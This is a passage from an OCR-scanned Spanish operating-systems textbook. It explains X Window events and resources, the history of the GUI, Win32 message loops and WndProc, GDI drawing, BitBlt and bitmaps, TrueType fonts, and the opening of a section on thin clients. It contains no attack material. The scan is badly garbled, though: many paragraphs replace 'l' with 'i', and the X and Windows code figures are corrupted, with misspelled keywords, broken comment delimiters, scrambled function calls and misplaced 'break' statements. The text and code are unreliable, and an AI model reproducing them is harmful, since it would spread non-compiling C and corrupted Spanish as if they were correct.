mensajes de una sola vía. No se espera una respuesta. La razón de este diseño es que cuando los 
procesos cliente y servidor están en distintos equipos, se puede requerir un periodo considerable 
para que el comando llegue al servidor y se lleve a cabo. Si se bloquea el programa de aplicación 
durante este tiempo, se reduciría su velocidad sin necesidad. Por otra parte, cuando el programa 
necesita información de la estación de trabajo, simplemente tiene que esperar a que la respuesta 
regrese. 

Al igual que Windows, X está en su mayor parte controlado por eventos. Los eventos fluyen 
de la estación de trabajo al programa, por lo general en respuesta a cierta acción humana, como las 
pulsaciones del teclado, los movimientos del ratón o la acción de descubrir una ventana. Cada men¬ 
saje de evento es de 32 bytes, en donde el primer byte indica el tipo de evento y los siguientes 31 
bytes indican información adicional. Existen varias docenas de tipos de eventos, pero a un progra¬ 
ma se le envían sólo los eventos que puede manejar. Por ejemplo, si un programa no está interesa¬ 
do en los eventos que ocurren cuando el usuario suelta una tecla, no se le envían eventos de 
liberación de tecla. Al igual que en Windows los eventos se ponen en cola, y los programas leen los 
eventos de la cola de entrada. 
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Sin embargo, a diferencia de Windows, ei sistema operativo nunca iiama a ios procedimientos 
dentro dei programa de apiicación por su cuenta. Ni siquiera sabe qué procedimiento maneja cuái 
evento. 

U n concepto ciave en X es ei recurso. U n recurso es una estructura de datos que contiene cier¬ 
ta información. Los programas de apiicación crean recursos en i as estaciones de trabajo. Los re¬ 
cursos se pueden compartir entre varios procesos en ia estación de trabajo. Los recursos tienen un 
tiempo de vida corto y no sobreviven a ios reinicios de ia estación de trabajo. Aigunos recursos 
típicos son ias ventanas, ios tipos de ietra, ios mapas de coiores (paietas de coiores), mapas de pí- 
xeies (mapas de bits), ios cursores y ios contextos gráficos. Estos úitimos se utiiizan para asociar 
ias propiedades con ias ventanas y son simiiares en concepto a ios contextos de dispositivos en 
Windows. 

En ia figura 5-38 se muestra un esqueieto incompieto de un programa deX. Empieza por in- 
ciuir ciertos encabezados requeridos y después deciara aigunas vari abies. Luego se conecta ai ser¬ 
vidor X especificado como ei parámetro paraXOpenDispiay. Después asigna un recurso de ventana 
y aimacena un manejador para este recurso en win. En ia práctica, aquí ocurriría cierta iniciaiiza- 
ción. Después de eso, ie indica ai administrador de ventanas que ia nueva ventana existe, para que 
pueda administrada. 

La iiamada a XCreateGC crea un contexto gráfico en ei que se aimacenan ias propiedades de 
ia ventana: en un programa máscompieto, podrían iniciaiizarse en ese punto. La siguiente instruc¬ 
ción, que es ia iiamada a XSeiectInput, indica ai servidor X qué eventos está preparado ei progra¬ 
ma para manejar. En este caso está interesado en ios ciics de ratón, ias puisaciones de tecias y ias 
ventanas que se descubren. En ia práctica, un programa reai estaría interesado también en otros 
eventos. Por úitimo, ia iiamada a XM apRaised asigna ia nueva ventana en ia pantaiia como ia ven¬ 
tana de nivei más superior. En este punto, ia ventana se vueive visibie en ia pantaiia. 

Ei cicio principai consiste en dos instrucciones y en sentido iógico es más simpie que ei cicio 
correspondiente en Windows. La primera instrucción aquí obtiene un evento y ia segunda envía ei 
tipo de evento para su procesamiento. Cuando aigún evento indica que ei programa ha terminado, 
en ejecución seestabiece en 0 y ei cicio termina. Antes de saiir, ei programa iibera ei contexto grá¬ 
fico, ia ventana y ia conexión. 

Vaie ia pena mencionar que no a todos Íes gusta una GUI. M uchos programadores prefieren 
una interfaz de iínea de comandos, dei tipo que vimos en ia sección 5.6.2 anterior. X se encarga de 
esto mediante un programa ciiente iiamado xterm. Este programa emuia una venerabie terminai in- 
teiigenteVT102, compieta con todas ias secuencias de escape. Así, ios editores como vi y emacs y 
demás software que utiiiza termcap funcionan en estas ventanas sin modificación. 


I nterfaces gráficas de usuario 

La mayoría de ias computadoras personai es ofrecen una GUI (Graphic User Interface, Interfaz grá¬ 
fica de usuario). 

La GUI fue inventada por Dougias Engeibarty su grupo de investigación en ei Stanford Re¬ 
search Institute. Después fue copiada por ios investigadores en Xerox PARC. Un buen día, Steve 
Jobs (co-fundador deAppie) estaba paseando por PARC y vio una GUI en una computadora Xerox 
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#include <X11/Xlib.h> 
#inclucle <X11/Xutil.h> 

main{int argc, char*argv[]) 

{ 

Display pant; 

Window vent; 

GC ge; 

XEvent evento; 
int enejecucion = 1; 


/* identificador del servidor *1 
I* identificador de ventana *1 
I* identificador del contexto gráfico *1 
I* almacenamiento para un evento *1 


pant =XOpenDisplay{"nombre_pantalla''); Ase conecta al servidorX *1 

vent = XCreateSimpleWindow{pant, ...); A asigna memoria para la nueva ventana *1 

XSetStandardProperties(pant, ...); A anuncia la ventana al admin. de ventanas *1 

ge =XCreateGC{pant, vent, 0, 0); A crea el contexto gráfico */ 

XSelectlnput{pant,vent, ButtonPressMask | KeyPressMask | ExposureMask); 

XMapRaisedfpant, vent); A muestra la ventana; envía evento Expose *1 


while (enejecucion) { 

XNextE ventfpant, Sievento); 
switch(evento.type) { 
case Expose: 
case ButtonPress: 
case Keypress; 

} 

} 


break 

break 

break 


XFreeGC{pant, ge); 
XDestroyWindowfpant, vent); 
XCIoseDisplay{pant); 


A obtiene el siguiente evento *1 

A vuelve a dibujar la ventana *1 
A procesa click del ratón */ 

A procesa entrada del teclado *1 


A libera el contexto gráfico */ 

A desasigna el espacio de memoria de la ventana *1 
A apaga la conexión de red *1 


Figura 5-38. U n esqueleto de un programa de aplicación de X Window. 


y dijo algo así como: "¡Dios mío! Éste es el futuro de la computación". La GUI le dio la idea para 
una nueva computadora, que se convirtió en L isa deA pple. L isa era demasiado costosa y fue un fra¬ 
caso comercial, pero su sucesora la M acintosh fue un enorme éxito. 

Cuando M icrosoft obtuvo un prototipo de la M acintosh para poder desarrollar M icrosoft Offi¬ 
ce en ella, rogó a Apple para que otorgara la licencia a todos los que quisieran para convertirla en 
el nuevo estándar en la industria. (M icrosoft hizo mucho más dinero con Office que con M S-DOS, 
por lo que estaba dispuesta a abandonar M S-DOS para tener una mejor plataforma para Office). El 
ejecutivo deA pple a cargo de la M acintosh, jean-Louis Gassée, se rehusó y Stevejobs ya no esta¬ 
ba ahí para contradecirlo. Con el tiempo M icrosoft obtuvo una licencia para los elementos de la in¬ 
terfaz. Esto formó la base de Windows. Cuando Windows empezó a obtener popularidad, Apple 
demandó a M icrosoft, arguyendo que M icrosoft había excedido la licencia, pero el juez no estuvo 
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de acuerdo y Windows sobrepasó a la M acintosh. Si Gassée hubiera estado de acuerdo con todas 
las personas dentro deApple que también querían otorgar licencia del software de M acintosh a to¬ 
dos, Apple tal vez se hubiera enriquecido inmensamente por las cuotas de la licencia y Windows no 
existiría en estos momentos. 

Una GUI tiene cuatro elementos esenciales, denotados por los caracteres WIM P. Las letras re¬ 
presentan ventanas (Windows), iconos (Icons), menús (Menus) y dispositivo señalador (Pointing 
device), respectivamente. Las ventanas son áreas rectangulares en la pantalla que se utilizan para 
ejecutar programas. Los iconos son pequeños símbolos en los que se puede hacer clic para que ocu¬ 
rra una acción. Los menús son listas de acciones, de las que se puede elegir una. Por último, un dis¬ 
positivo señalador es un ratón, trackball u otro dispositivo de hardware utilizado para desplazar un 
cursor alrededor de la pantalla para seleccionar elementos. 

El software de GUI se puede implementar en código a nivel de usuario, como en los sistemas 
UNIX, o en el mismo sistema operativo, como en el caso de Windows. 

La entrada para los sistemas GUI sigue utilizando el teclado y el ratón, pero la salida casi siem¬ 
pre va a un hardware especial, conocido como adaptador de gráficos. Un adaptador de gráficos 
contiene una memoria especial conocida como RAM de video que contiene las imágenes que apa¬ 
recen en la pantalla. Los adaptadores de gráficos de alto rendimiento a menudo tienen CPUs pode¬ 
rosas de 32 o 64 bits, y hasta 1GB de su propia RAM, separada de la memoria principal de la 
computadora. 

Cada adaptador de gráficos produce ciertos tamaños de pantalla. Los tamaños comunes son 
1024 X 768,1280 x 960, 1600 x 1200 y 1920 x 1200. Todos estos (excepto el de 1920 x 1200) 
se encuentran en proporción de 4:3, que se adapta a la proporción de aspecto de los televisores 
NTSC y PAL, y por ende proporciona pixeles cuadrados en los mismos monitores que se utilizan 
para los televisores. El tamaño de 1920 x 1200 está destinado para los monitores de pantalla am¬ 
plia, cuya proporción de aspecto coincide con esta resolución. En la resolución más alta, una pan¬ 
talla de colores con 24 bits por pixel requiere aproximadamente 6.5 M B de RAM sólo para contener 
la imagen, por lo que con 256 o más, el adaptador de gráficos puede contener muchas imágenes a la 
vez. Si la pantalla completa se actualiza 75 veces por segundo, la RAM de video debe ser capaz de 
transferir datos en forma continua a 489 M B/seg. 

El software de salida para las GUIs es un tema masivo. Se han escrito muchos libros de 1500 
páginas tan sólo acerca de la Windows GUI (por ejemplo, Petzoid, 1999; Simón, 1997; y Rector y 
Newcomer, 1997). Es evidente que en esta sección sólopodemos rasguñar la superficie y presentar 
unos cuantos de los conceptos subyacentes. Para que el análisis sea concreto, describiremos la API 
Win32, que es proporcionada por todas las versiones de 32 bits de Windows. El software de salida 
para las otras GUIs apenas si es comparable en un sentido general, pero los detalles son muy dis¬ 
tintos. 

El elemento básico en la pantalla es un área rectangular llamada ventana. La posición y el ta¬ 
maño de una ventana se determinan en forma única al proporcionar las coordenadas (en pixeles) de 
dos esquinas diagonalmente opuestas. Una ventana puede contener una barra de título, una barra 
de menús, una barra de desplazamiento vertical y una barra de desplazamiento horizontal. En la fi¬ 
gura 5-39 se muestra una ventana ordinaria. Observe que el sistema de coordenadas de Windows 
posiciona el origen en la esquina superior izquierda, en donde y se incrementa hacia abajo, lo cual 
es distinto de las coordenadas cartesianas que se utilizan en matemáticas. 
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Figura 5-39. U na ventana de ejemplo ubicada en (200,100), en una pantalla XGA. 


Cuando se crea una ventana, los parámetros especifican si el usuario puede moverla, cambiar 
su tamaño o desplazarse en su interior (arrastrando el control deslizante en la barra de desplaza¬ 
miento). La ventana principal que producen la mayoría de los programas se puede mover, cambiar 
su tamaño y desplazar por su interior, lo cual tiene enormes consecuencias en cuanto a la forma en 
que se escriben los programas de Windows. En especial, los programas deben estar informados 
acerca délos cambios en el tamaño de sus ventanas, y deben estar preparados para redibujar el con¬ 
tenido de sus ventanas en cualquier momento, incluso cuando menos lo esperan. 

Como consecuencia, los programas de Windows están orientados a los mensajes. Las acciones 
de los usuarios que involucran al teclado o al ratón son capturadas por Windows y se convierten en 
mensajes para el programa propietario de la ventana que se está utilizando. Cada programa tiene 
una cola de mensajes a donde se envían los mensajes relacionados con todas sus ventanas. El ciclo 
principal del programa consiste en extraer el siguiente mensaje y procesarlo mediante la llamada a 
un procedimiento interno para ese tipo de mensaje. En algunos casos el mismo Windows puede lla¬ 
mar a estos procedimientos directamente, evadiendo la cola de mensajes. Este modelo es bastante 
distinto al modelo de UNIX de código por procedimientos que realiza las llamadas al sistema para 
interactuar con el sistema operativo. Sin embargo, X es orientado a eventos. 
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Para que este modelo de programación sea más claro, considere el ejemplo de la figura 5-40. A quí 
podemos ver el esqueleto de un programa principal para Windows. No está completo y no realiza com¬ 
probación de errores, pero muestra el suficiente detalle para nuestros fines. Empieza por incluir un 
archivo de encabezado llamado windows.h, el cual contiene muchas macros, tipos de datos, constantes, 
prototipos de funciones y demás información necesaria para los programas de Windows. 


#include <windows.h> 


intWINAPI WinMain{HINSTANCE h, HINSTANCE, hprev, char*szCmd intiCmdShow) 

{ 

WNDCLASS wndclass; /* objeto de clase para esta ventana *! 

MSG msg; /* los mensajes entrantes se almacenan aquí */ 

HWND hwnd; /* manejador (apuntador) para el objeto ventana *! 

I* Iniclallza wndclass *1 

wndclass.IpfnWndProc =WndProc; /* Indica a cuál procedimiento llamar*/ 

wndclass.IpszClassName ="Nombre del programa"; /*Texto para la barra de título *1 
wndclass.hicon = Loadlcon{NULL, IDI_APPLICATION); I* carga el Icono del programa */ 
wndclass.hCursor = LoadCursor{NULL, IDC_ARROW); I* carga el cursor del ratón */ 


Registe rClass{6iwndclass): 
hwnd = CreateWlndow{... ) 
ShowWlndow{hwnd, ICmdShow); 
UpdateWlndow{hwnd); 


I* Indica a Windows acerca de wndclass *1 
I* asigna espacio de almacenamiento para la ventana *1 
I* muestra la ventana en la pantalla *1 
I* Indica a la ventana que se pinte a sí misma *1 


} 


while {GetMessage{&msg, NULL, 0, 0)) { I* obtiene mensaje de la cola */ 
TranslateMessageí&msg); I* traduce el mensaje */ 

DIspatchMessageí&msg); I* envía el mensaje al procedimiento apropiado *1 

} 

return{msg.wParam); 


long CALLBACK WndProc{HWND hwnd, UINT message, UINT wParam, long IParam) 

{ 

/*Aquí van las declaraciones *1 
switch (mensaje) { 

case WM_CREATE: ...; return ...; /* crea la ventana */ 

case WM_PAINT: ...; return ...; /* vuelve a pintar contenido de ventana */ 

case WM_DESTROY: ...; return ...; /* destruye la ventana */ 

} 

return(DefWlndowProc(hwnd, message, wParam, IParam)); /* predeterminado *1 

} 


Figura 5-40. U n esqueleto de un programa principal de Windows. 
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El programa principal empieza con una declaración en la que proporciona su nombre y pará¬ 
metros. La macro WINAPI es una instrucción para que el compilador utilice cierta convención de 
paso de parámetros, y no es relevante para nosotros. El primer parámetro (h) es un manejador 
de instancia y se utiliza para identificar el programa para el resto del sistema. En cierto grado, 
Win32 está orientado a objetos, lo cual significa que el sistema contiene objetos (por ejemplo, pro¬ 
gramas, archivos y ventanas) que tienen cierto estado y un código asociado, conocidos como mé¬ 
todos, que operan sobre ese estado. Para hacer referencia a los objetos se utilizan manejadoras, y 
en este caso, h identifica el programa. El segundo parámetro está presente sólo por razones de 
compatibilidad retroactiva. Ya no se utiliza. El tercer parámetro (szCmd) es una cadena con termi¬ 
nación cero que contiene la línea de comandos que inició el programa, incluso aunque no se haya 
iniciado desde una línea de comandos. El cuarto parámetro (iCmdShow) indica si la ventana ini¬ 
cial del programa debe ocupar toda la pantalla, parte de la misma o ninguna área de la pantalla (só¬ 
lo en la barra de tareas). 

Esta declaración ilustra una convención ampliamente utilizada por M icrosoft, conocida como 
notación húngara. El nombre es un juego de palabras sobre la notación polaca, el sistema postfi¬ 
jo inventado por el lógico polaco]. Lukasiewicz para representa fórmulas algebraicas sin utilizar 
precedencia o paréntesis. La notación húngara fue inventada por un programador húngaro de M i- 
crosoft llamado Charles Simonyi, y utiliza los primeros caracteres de un identificador para especi¬ 
ficar el tipo. Las letras y tipos permitidos incluyen c (carácter), w (palabra, que ahora significa un 
entero de 16 bits sin signo), i (entero con signo de 32 bits), I (long, también un entero con signo de 
32 bits), s (cadena), sz (cadena terminada con un byte cero), p (apuntador), fn (función) y h (mane¬ 
jador). Así, szCmd es una cadena con terminación cero e iCmdShow es un entero, por ejemplo. M u- 
chos programadores creen que codificar el tipo en nombres de variables de esta forma tiene poco 
valor, y hace que el código de Windows sea excepcional mente difícil de leer. No hay nada análogo 
a esta convención presente en U NIX. 

Cada ventana debe tener un objeto de clase asociado que defina sus propiedades. En la figura 
5-40, ese objeto de clase es wndclass. Un objeto detipo WNDCLASS tiene 10 campos, cuatro délos 
cuales se inicializan en la figura 5.40. En un programa real, los otros seis también se inicializarían. 
El campo más importante es IpfnWndP roe, que es un apuntador largo (es decir, de 32 bits) a la fun¬ 
ción que maneja los mensajes dirigidos a esta ventana. Los demás campos que se inicializan aquí 
indican el nombre e icono a usar en la barra de título, y qué símbolo se debe usar para el cursor del 
ratón. 

Una vez inicializado wndclass, se hace una llamada a RegisterClass para pasarlo a Windows. 
En especial, después de esta llamada Windows sabe a qué procedimiento debe llamar cuando ocu¬ 
rran varios eventos que no pasen a través de la cola de mensajes. La siguiente llamada, CreateWin- 
dow, asigna memoria para la estructura de datos de la ventana y devuelve un manejador para hacer 
referencia a ella posteriormente. Después el programa realiza dos llamadas más en fila, para colo¬ 
car el contorno de la ventana en la pantalla, y por último se rellena por completo. 

En este punto llegamos al ciclo principal del programa, que consiste en obtener un mensaje, 
realizarle ciertas traducciones y después pasarlo de vuelta a Windows, para que invoque a WndP roe 
y lo procese. Para responder a la pregunta de si todo este mecanismo se hubiera podido simplificar, 
la respuesta es sí, pero se hizo de esta forma por razones históricas, (y ahora lo hacemos por cos¬ 
tumbre). 
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Después del programa principal está el procedimiento WndProc, que maneja losdiversos men¬ 
sajes que se pueden enviar a la ventana. El uso de CALLBACK aquí, al igual que WINAPI anterior¬ 
mente, especifica la secuencia de llamada a usar para los parámetros. El primer parámetro es el 
manejador de la ventana a utilizar. El segundo parámetro es el tipo de mensaje. Los parámetros ter¬ 
cero y cuarto se pueden utilizar para proveer información adicional cuando sea necesario. 

Los tipos de mensajes WM_C REATE y WM_DESTROY se envían al inicio y al final del progra¬ 
ma, respectivamente. Por ejemplo, dan al programa la oportunidad de asignar memoria para las es¬ 
tructuras de datos y después devolverla. 

El tercer tipo de mensaje, WM_PAINT, es una instrucción para que el programa rellene la ven¬ 
tana. No sólo se llama cuando se dibuja la ventana por primera vez, sino que también se llama con 
frecuencia durante la ejecución del programa. En contraste a los sistemas basados en texto, en Win¬ 
dows un programa no puede asumir que lo que dibuje en la pantalla permanecerá ahí hasta que lo 
quite. Se pueden arrastrar otras ventanas encima de ésta, pueden desplegarse menús sobre ella, pue¬ 
de haber cuadros de diálogo y cuadros de información sobre herramientas cubriendo parte de ella, y 
así en lo sucesivo. Cuando se eliminan estos elementos, la ventana se tiene que volver a dibujar. La 
forma en que Windows indica a un programa que debe volver a dibujar una ventana es enviándole 
un mensaje WM_PAI NT. Como gesto amigable, también proporciona información acerca de qué par¬ 
te de la ventana se ha sobrescrito, en caso de que sea más fácil regenerar esa parte de la ventana en 
vez de volver a dibujarla toda. 

Hay dos formas en que Windows puede hacer que un programa realice algo. Una de ellas es 
publicar un mensaje en su cola de mensajes. Este método se utiliza para la entrada del teclado, del 
ratón y los temporizadores que han expirado. La otra forma, enviar un mensaje a la ventana, impli¬ 
ca que Windows llame directamente a WndProc. Este método se utiliza para todos los demás even¬ 
tos. Como a Windows se le notifica cuando un mensaje se ha procesado por completo, puede 
abstenerse de realizar una nueva llamada hasta que termine la anterior. De esta manera se evitan las 
condiciones de competencia. 

H ay muchos tipos de mensajes más. Para evitar un comportamiento errático en caso de que lle¬ 
gue un mensaje inesperado, el programa debe llamar a DefWindowProc al final de WndProc para 
dejar que el manejador predeterminado se encargue de los demás casos. 

En resumen, un programa de Windows por lo general crea una o más ventanas con un objeto 
de clase para cada una. En última instancia, el comportamiento del programa está controlado por 
los eventos entrantes, que se procesan mediante los procedimientos del manejador. Éste es un mo¬ 
delo muy diferente del mundo que la visión más orientada a procedimientos de UNIX. 

La acción de dibujar en la pantalla se maneja mediante un paquete que consiste en cientos de 
procedimientos, que en conjunto forman la GDI (G raphics Device Interface, Interfaz de dispositi¬ 
vo gráfico). Puede manejar texto y todo tipo de gráficos, y está diseñada para ser independiente de 
la plataforma y del dispositivo. Antes de que un programa pueda dibujar (es decir, pintar) en una 
ventana, necesita adquirir un contexto de dispositivo, que es una estructura de datos interna que 
contiene propiedades de la ventana, como el tipo de letra actual, color de texto, color de fondo, et¬ 
cétera. La mayoría de las llamadas a la GDI utilizan el contexto de dispositivo, ya sea para dibujar 
o para obtener o establecer las propiedades. 

Existen varias formas de adquirir el contexto de dispositivo. Un ejemplo simple de esta adqui¬ 
sición y uso es: 
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hdc = GetDC(hwnd); 

Textout(hdc, x, y, psText, ILength); 

ReleaseDC(hwnd, hdc); 

La primera instrucción obtiene un manejador para un contexto de dispositivo, hdc. La segunda uti- 
iiza ei contexto de dispositivo para escribir una iínea de texto en ia pantaiia, especificar ias coorde¬ 
nadas (x, y) de ia posición en ia que inicia ia cadena, un apuntador a ia misma cadena y su iongitud. 
La tercera iiamada iibera ei contexto dei dispositivo para indicar que ei programa ha terminado de 
dibujar por ei momento. Observe que hdc se utiiiza de una manera anáioga a un descriptor de ar¬ 
chivo de UNIX. Observe además que ReleaseDC contiene información redundante (ei uso de hdc 
especifica una ventana en forma única). Ei uso de información redundante que no tiene vaioractuai es 
común en Windows. 

Otra observación interesante es que cuando hdc se adquiere de esta forma, ei programa sóio 
puede escribir en ei área ciiente de ia ventana, no en ia barra detítuio ni en otras partes de eiia. Cuai- 
quier dibujo fuera deia región de recorte se ignora. Sin embargo, hay otra forma de adquirir un con¬ 
texto de dispositivo, GetWindowDC, que estabiece ia región de recorte como toda ia ventana. Otras 
iiamadas restringen ia versión de recorte de otras formas. Tener varias iiamadas que hacen casi io 
mismo es aigo característico de Windows. 

U n anái i si s detai i ado de i a G DI excede i os ai canees de este i i bro. P ara ei i ector i nteresado, i as 
referencias antes citadas proveen información adicionai. Sin embargo, vaie ia pena mencionar 
unas cuantas paiabras acerca de ia GDI, dada su importancia. GDI tiene varias iiamadas a proce¬ 
dimientos para obtener y iiberar contextos de dispositivos, obtener información acerca de ios con¬ 
textos de dispositivos, obtener y estabiecer ios atributos dei contexto de dispositivo (por ejempio, 
ei coior de fondo), manipuiar objetos de ia GDI como pluma, brochas y tipos de letra, cada una de 
las cuales tiene sus propios atributos. Por último, desde luego que hay un gran número de llama¬ 
das de la GDI para dibujar en la pantalla. 

Los procedimientos de dibujo se dividen en cuatro categorías: dibujo de líneas y curvas, dibu¬ 
jo de áreas rellenas, administración de mapas de bits y visualización de texto. Anteriormente vimos 
un ejemplo de cómo dibujar texto, por lo que ahora daremos un vistazo rápido a uno de los otros. 
La llamada 

Rectangle(hdc, xizq, ysup, xder, yinf); 

dibuja un rectángulo relleno cuyas esquinas son (xizq, ysup) y (xder, yinf). Por ejemplo, 
Rectangle(hdc, 2, 1, 6, 4); 

dibujará el rectángulo que se muestra en la figura 5-41. La anchura y color de línea, y el color de 
relleno se toman del contexto de dispositivo. Otras llamadas de la GDI son similares. 

M apas de bits 

Los procedimientos de la GDI son ejemplos de gráficos vectoriales. Se utilizan para colocar figu¬ 
ras geométricas y texto en la pantalla. Se pueden escalar con facilidad a pantallas más grandes o pe¬ 
queñas (siempre y cuando el número de pixeles en la pantalla sea el mismo). También son 
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Figura 5-41. U n rectángulo de ejemplo, dibujado mediante ei uso de Rectangle. Cada 
cuadro representa un pixei. 


relativamente independientes del dispositivo. Una colección de llamadas a procedimientos de la 
GDI se puede ensamblar en un archivo que describa un dibujo completo. A dicho archivo se le co¬ 
noce como metarchivo de Windows, y es ampliamente utilizado para transmitir dibujos de un pro¬ 
grama de Windows a otro. Dichos archivos tienen la extensión .wmf. 

M uchos programas de Windows permiten al usuario copiar (parte de) un dibujo y colocarlo en 
el portapapeles de Windows. Después, el usuario puede ir a otro programa y pegar el contenido del 
portapapeles en otro documento. U na manera de hacer esto es que el primer programa represente el 
dibujo como un metarchivo de Windows y lo coloque en el portapapeles en el formato .wmf. Tam¬ 
bién existen otras formas. 

No todas las imágenes que pueden manipular las computadoras se pueden generar mediante 
gráficos vectoriales. Por ejemplo, las fotografías y los videos no utilizan gráficos vectoriales. En 
vez de ello, estos elementos se exploran al sobreponer una rejilla en la imagen. Los valores rojo, 
verde y azul promedio de cada cuadro de la rejilla se muestrean y se guardan como el valor de un 
pixel. A dicho archivo se le conoce como mapa de bits. Hay muchas herramientas en Windows pa¬ 
ra manipular mapas de bits. 

Otro uso para los mapas de bits es el texto. U na forma de representar un carácter específico en 
cierto tipo de letra es mediante un pequeño mapa de bits. Al agregar texto a la pantalla se convier¬ 
te entonces en cuestión de mover mapas de bits. 

Una forma general de utilizar mapas de bits es a través de un procedimiento llamado bitbit. Se 
llama de la siguiente manera: 

BitBlt(dsthdc, dx, dy, wid, ht, srchdc, sx, sy, rasterop); 

En su forma más simple, copia un mapa de bits de un rectángulo en una ventana a un rectángulo en 
otra ventana (o la misma). Los primeros tres parámetros especifican la ventana de destino y la po¬ 
sición. Después vienen la anchura y la altura. Luego la ventana de origen y la posición. Observe que 
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cada ventana tiene su propio sistema de coordenadas, con (0, 0) en ia esquina superior izquierda de 
ia ventana. Describiremos ei úitimo parámetro a continuación. Ei efecto de 

BitBlt(hdc2, 1, 2, 5, 7, hdcl, 2, 2, SRCCOPY); 

se muestra en ia figura 5-42. Observe con cuidado que se ha copiado toda ei área de 5 x 7 de ia ie- 
traA, inciuyendo ei coior de fondo. 



(a) (b) 

Figura 5-42. Copiado de mapas de bits usando BitBIt. {a)Antes. (b) Después. 

BitBit puede hacer más que sóio copiar mapas de bits. Ei úitimo parámetro nos da ia posibiii- 
dad de reaiizar operaciones booieanas para combinar ei mapa de bits de origen y ei mapa de bits de 
destino. Por ejempio, se puede apiicar un OR ai origen con ei destino para fusionados. También se 
puede apiicar un OR EXCLUSIVO en ellos, con lo cual se mantienen las características tanto del 
origen como del destino. 

U n problema con los mapas de bits es que no se escalan. U n carácter que está en un cuadro de 
8 X 12 en una pantalla de 640 x 480 se verá razonable. No obstante, si este mapa de bits se copia a 
una página impresa a 1200 puntos/pulgada, que equivale a 10200 bits x 13200 bits, la anchura del 
carácter (8 pixeles) será de 8/1200 pulgadas, o 0.17 mm de ancho. Además, el copiado entre dispo¬ 
sitivos con distintas propiedades de color o entre monocromo y color no funciona bien. 

Por esta razón, Windows también tiene soporte para una estructura de datos llamada DIB (De- 
vice Independent Bitmap, M apa de bits independiente del dispositivo). Los archivos que utilizan es¬ 
te formato usan la extensión .bmp. Estos archivos tienen encabezados de archivo y de información, 
y una tabla de color antes de los pixeles. Esta información facilita la acción de mover los mapas de 
bits entre dispositivos que no son similares. 

Tipos de letras 

En versiones de Windows anteriores a la 3.1, los caracteres se representaban como mapas de bits y 
se copiaban en la pantalla o en la impresora mediante BitBit. El problema con eso, como acabamos de 
ver, es que un mapa de bits que se ve bien en la pantalla es demasiado pequeño para la impresora. 
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Además se necesita un mapa de bits diferente para cada carácter en cada tamaño. En otras paiabras, 
dado ei mapa de bits para A en un tipo de ietra de 10 puntos, no hay manera de caicuiario para un 
tipo de ietra de 12 puntos. Como cada carácter de cada tipo de ietra podría ser necesario para tama¬ 
ños que varíen entre 4 y 120 puntos, sería necesaria una cantidad enorme de mapas de bits. Todo ei 
sistema era demasiado compiejo para ei texto. 

La soiución fue ia introducción de ios tipos de ietra TrueType, que no son mapas de bits sino 
contornos de ios caracteres. Cada carácter TrueType se define mediante una secuencia de puntos ai- 
rededor de su perímetro. Todos ios puntos son reiativos ai origen (0, 0). M ediante este sistema es 
fácii escaiar ios caracteres hacia arriba o hacia abajo. Todo io que se tiene que hacer es muitipiicar 
cada coordenada por ei mismo factor de escaia. De esta forma, un carácter TrueType se puede es¬ 
caiar hacia arriba o hacia abajo a cuaiquier tamaño de punto, inciuso hasta tamaños de punto frac¬ 
cionados. Una vez que tengan ei tamaño apropiado, ios puntos se pueden conectar utiiizando ei 
reconocido aigoritmo de "seguir ios puntos" que se enseña en preescoiar (ias escueias de preesco- 
iar modernas utiiizan iíneas tipo junquiiio [spiines] para obtener resuitados más uniformes). Una 
vez que se ha compietado ei contorno, ei carácter se puede reiienar. En ia figura 5-43 se proporcio¬ 
na un ejempio de aigunos caracteres escaiados a tres distintos tamaños de punto. 




<1 



Figura 5-43. Algunos ejemplos de contornos de caracteres en distintos tamaños de 
punto. 

Una vez que ei carácter reiieno está disponibie en forma matemática, puede convertir en tramas 
o rasterizarse; es decir, convertirse en un mapa de bits a cuaiquier resoiución deseada. Ai escaiar pri¬ 
mero y convertir en tramas después, podemos estar seguros de que ios caracteres mostrados en ia pan- 
taiia y ios que aparezcan en ia impresora serán io más parecidos posibies, con diferencias sóio en error 
de cuantización. Para mejorar aún más ia caiidad, es posibie empiear ia técnica de hinting, que ajusta 
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el resultado de convertir de contorno a trama. Por ejemplo, los patines de la parte superior de la letra 
T deben ser idénticos: dado un error de redondeo esto no es posibles! no se utiliza el hinting. Esta téc¬ 
nica mejora la apariencia final. 


5.7 CLIENTESDELGADOS 

Con el paso de los años, el principal paradigma de la computación ha oscilado entre la computación 
centralizada y descentralizada. Las primeras computadoras (como ENIAC) eran de hecho compu¬ 
tadoras personales, aunque muy extensas, ya que sólo una persona podía usarlas a la vez. Después 
llegaron los sistemas de tiempo compartido, en donde muchos usuarios remotos en terminales sim¬ 
ples compartían una gran computadora central. Después llegó la era de la PC, en donde los usua¬ 
rios tenían sus propias computadoras personales de nuevo. 

A unque el modelo de PC descentralizado tiene sus ventajas, también tiene algunas desventajas 
graves que apenas se están empezando a tomar con seriedad. Probablemente el mayor problema es 
que cada PC tiene un disco duro extenso y software complejo que se debe mantener. Por ejemplo, 
cuando sale al mercado una nueva versión del sistema operativo, hay que trabajar mucho para rea¬ 
lizar la actualización en cada equipo por separado. En la mayoría délas empresas, los costos de ma¬ 
no de obra por realizar este tipo de mantenimiento de software empequeñecen a los costos actuales 
de hardware y software. Para los usuarios domésticos la labor es técnicamente gratuita, pero pocas 
personas son capaces de realizarla en forma correcta y menos personas aún disfrutan haciéndolo. 
Con un sistema centralizado, sólo una o unas cuantas máquinas tienen que actualizarse, y esas má¬ 
quinas tienen un personal de expertos para realizar el trabajo. 

U na cuestión relacionada es que los usuarios deben hacer respaldos con regularidad de sus sis¬ 
temas de archivos con gigabytes de datos, pero pocos lo hacen. Cuando ocurre un desastre, casi 
siempre va acompañado de gemidos y estrujamiento de manos. Con un sistema centralizado se pue¬ 
den realizar respaldos cada noche mediante robots de cintas automatizados. 

Otra desventaja es que la compartición de recursos es más fácil con los sistemas centraliza¬ 
dos. U n sistema con 256 usuarios remotos, cada uno con 256 M B de RA M tendrán la mayor par¬ 
te de esa RA M inactiva durante la mayor parte del tiempo. Con un sistema centralizado con 64 
GB de RA M , nunca pasa que algún usuario necesite temporalmente mucha RAM y no pueda ob¬ 
tenerla debido a que está en la PC de alguien más. Lo mismo se aplica para el espacio de disco y 
otros recursos. 

Por último, estamos empezando a ver un cambio de la computación céntrica de PC a la compu¬ 
tación céntrica de Web. Un área en donde este cambio está bien adelantado es el correo electrónico. La 
gente solía obtener su correo electrónico en su equipo en el hogar y lo leía ahí. Hoy en día, muchas per¬ 
sonas entran en Gmail, Hotmail o Yahoo! y leen su correo ahí. El siguiente paso es que las personas ini¬ 
